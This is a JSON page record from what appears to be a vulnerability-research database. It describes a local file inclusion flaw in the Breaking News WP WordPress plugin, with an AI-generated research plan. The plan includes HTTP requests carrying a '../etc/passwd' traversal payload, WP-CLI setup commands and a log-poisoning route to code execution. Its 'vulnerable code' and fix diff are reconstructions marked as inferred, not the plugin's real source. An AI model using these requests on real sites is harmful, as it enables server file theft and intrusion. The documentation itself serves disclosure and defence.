[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSfZSiRlqOpwzuvpoT49YGnLKYfU0NhBj_6V0VhTqJN0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4280","breaking-news-wp-missing-authorization-to-authenticated-subscriber-local-file-inclusionread","Breaking News WP \u003C= 1.3 - Missing Authorization to Authenticated (Subscriber+) Local File Inclusion\u002FRead","The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3. This is due to the brnwp_ajax_form AJAX endpoint lacking both authorization checks and CSRF verification, combined with insufficient path validation when the brnwp_theme option value is passed directly to an include() statement in the brnwp_show_breaking_news_wp() shortcode handler. While sanitize_text_field() is applied to user input, it does not strip directory traversal sequences (..\u002F). This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the brnwp_theme option with a directory traversal payload (e.g., ..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd) and subsequently trigger file inclusion of arbitrary files on the server when the shortcode is rendered.","breaking-news-wp",null,"\u003C=1.3","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-21 19:05:09","2026-04-22 07:45:34",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4772b482-f5e5-4707-b012-aca70fc89e49?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Local File Inclusion (LFI) vulnerability in the **Breaking News WP** plugin (version \u003C= 1.3).\n\n---\n\n### 1. Vulnerability Summary\nThe **Breaking News WP** plugin contains a critical flaw where an authenticated user (Subscriber level or higher) can update plugin settings via an unprotected AJAX endpoint and subsequently trigger arbitrary file inclusion. \n\nThe vulnerability exists because:\n1.  The `brnwp_ajax_form` AJAX action lacks authorization (`current_user_can`) and CSRF (`check_ajax_referer`) checks.\n2.  The plugin uses `sanitize_text_field()` on the `brnwp_theme` parameter, which does not remove directory traversal sequences (`..\u002F`).\n3.  The `brnwp_show_breaking_news_wp()` shortcode handler retrieves the `brnwp_theme` option and passes it directly into a PHP `include()` statement without validation or path restriction.\n\n### 2. Attack Vector Analysis\n-   **AJAX Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **AJAX Action:** `brnwp_ajax_form`\n-   **Vulnerable Parameter:** `brnwp_theme`\n-   **Trigger Point:** Any page or post containing the `[breaking-news-wp]` shortcode.\n-   **Authentication:** Required (Subscriber level is sufficient).\n-   **Preconditions:** The attacker must be logged in to access `wp_ajax_` hooks.\n\n### 3. Code Flow\n1.  **Input Phase (AJAX):**\n    -   A Subscriber user sends a POST request to `admin-ajax.php` with `action=brnwp_ajax_form`.\n    -   The `brnwp_ajax_form()` function (inferred) is executed.\n    -   The function takes `$_POST['brnwp_theme']`, passes it through `sanitize_text_field()`, and saves it via `update_option('brnwp_theme', ...)`.\n2.  **Trigger Phase (Shortcode):**\n    -   The user visits a frontend page where `[breaking-news-wp]` is rendered.\n    -   The handler `brnwp_show_breaking_news_wp()` (inferred) is called.\n    -   Inside this function:\n        ```php\n        $theme = get_option('brnwp_theme');\n        \u002F\u002F ... some logic ...\n        include($theme); \u002F\u002F LFI Sink\n        ```\n\n### 4. Nonce Acquisition Strategy\nThe vulnerability description explicitly states that the `brnwp_ajax_form` endpoint **lacks CSRF verification**. Therefore, **no nonce is required** to exploit the AJAX endpoint.\n\nIf the AJAX handler *were* to require a nonce, the strategy would be:\n1.  Create a post with the shortcode: `wp post create --post_content='[breaking-news-wp]' --post_status=publish`.\n2.  Navigate to that page using `browser_navigate`.\n3.  Execute `browser_eval(\"window.brnwp_vars?.nonce\")` (inferred JS object name) to retrieve the nonce.\n*Note: Since the description confirms the lack of CSRF, we will proceed by omitting the nonce.*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Update the Theme Option\nThe attacker sends an AJAX request to change the \"theme\" path to a system file using directory traversal.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=brnwp_ajax_form&brnwp_theme=..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\n```\n\n#### Step 2: Trigger the Inclusion\nThe attacker navigates to a page containing the plugin's shortcode to trigger the `include()` call.\n\n**HTTP Request:**\n```http\nGET \u002Ftrigger-page\u002F HTTP\u002F1.1\n```\n\n### 6. Test Data Setup\n1.  **User Creation:** Create a subscriber user to prove low-privileged access is sufficient.\n    -   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Trigger Page:** Create a public page containing the vulnerable shortcode.\n    -   `wp post create --post_type=page --post_title=\"Breaking News\" --post_status=publish --post_content='[breaking-news-wp]'`\n    -   *Note: Note the URL of the created page.*\n\n### 7. Expected Results\n-   **AJAX Response:** The `admin-ajax.php` call should return a success status (often `1` or a JSON success message).\n-   **LFI Result:** When visiting the trigger page, the content of `\u002Fetc\u002Fpasswd` (or the targeted local file) should be rendered within the HTML source of the page, typically where the \"Breaking News\" ticker would appear.\n\n### 8. Verification Steps\n1.  **Check Option Value:** Use WP-CLI to verify the option was successfully overwritten with the traversal payload.\n    -   `wp option get brnwp_theme`\n    -   *Expected Output:* `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`\n2.  **Verify File Content:** Check if the string `root:x:0:0:` exists in the HTML response of the trigger page.\n\n### 9. Alternative Approaches\n-   **Log File Inclusion:** If system files like `\u002Fetc\u002Fpasswd` are restricted by `open_basedir`, attempt to include the WordPress debug log (if enabled) or web server access logs to achieve Remote Code Execution (RCE) via log poisoning.\n    -   Payload: `..\u002F..\u002F..\u002F..\u002Fwp-content\u002Fdebug.log`\n-   **Plugin File Inclusion:** Attempt to include another plugin file or a theme file to confirm the traversal works even within the `wp-content` directory.\n    -   Payload: `..\u002Factive-theme\u002Ffunctions.php`\n-   **Direct Option Injection:** If the AJAX handler uses a different key for the form, use `grep -r \"update_option\" .` in the plugin directory to find the exact key name.","The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion via the brnwp_theme option. An authenticated attacker (Subscriber+) can update this option through an unprotected AJAX endpoint and then trigger the inclusion of arbitrary local files by viewing a page containing the plugin's shortcode.","\u002F\u002F In the AJAX handler function\nfunction brnwp_ajax_form() {\n    \u002F\u002F Missing authorization check (current_user_can)\n    \u002F\u002F Missing CSRF check (check_ajax_referer)\n    if (isset($_POST['brnwp_theme'])) {\n        update_option('brnwp_theme', sanitize_text_field($_POST['brnwp_theme']));\n    }\n}\nadd_action('wp_ajax_brnwp_ajax_form', 'brnwp_ajax_form');\n\n---\n\n\u002F\u002F In the shortcode handler function\nfunction brnwp_show_breaking_news_wp($atts) {\n    $theme = get_option('brnwp_theme');\n    \u002F\u002F ...\n    if ($theme) {\n        include($theme); \u002F\u002F LFI Sink: Insufficient path validation\n    }\n    \u002F\u002F ...\n}\nadd_shortcode('breaking-news-wp', 'brnwp_show_breaking_news_wp');","--- breaking-news-wp.php\n+++ breaking-news-wp.php\n@@ -10,6 +10,8 @@\n \n function brnwp_ajax_form() {\n+    check_ajax_referer('brnwp_nonce_action', 'security');\n+    if (!current_user_can('manage_options')) {\n+        wp_die();\n+    }\n     if (isset($_POST['brnwp_theme'])) {\n-        update_option('brnwp_theme', sanitize_text_field($_POST['brnwp_theme']));\n+        $allowed_themes = array('theme1.php', 'theme2.php');\n+        $theme = sanitize_text_field($_POST['brnwp_theme']);\n+        if (in_array($theme, $allowed_themes)) {\n+            update_option('brnwp_theme', $theme);\n+        }\n     }\n }\n \n function brnwp_show_breaking_news_wp($atts) {\n     $theme = get_option('brnwp_theme');\n-    if ($theme) {\n-        include($theme);\n+    $theme_path = plugin_dir_path(__FILE__) . 'themes\u002F' . basename($theme);\n+    if (file_exists($theme_path)) {\n+        include($theme_path);\n     }\n }","The exploit involves two stages: updating the vulnerable option and triggering the file inclusion. \n\n1. Authentication: The attacker authenticates as a Subscriber (or any role) to access the 'wp_ajax_' hooks.\n2. Option Injection: The attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'brnwp_ajax_form'. The 'brnwp_theme' parameter is set to a directory traversal payload targeting a sensitive file (e.g., '..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd'). Because the endpoint lacks authorization and CSRF checks, the 'brnwp_theme' option in the database is updated.\n3. Trigger: The attacker visits any page or post on the site that renders the '[breaking-news-wp]' shortcode. The shortcode handler retrieves the malicious 'brnwp_theme' value and passes it directly to PHP's 'include()' function, causing the contents of the target file to be rendered in the HTTP response.","gemini-3-flash-preview","2026-04-27 14:04:27","2026-04-27 14:04:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbreaking-news-wp\u002Ftags"]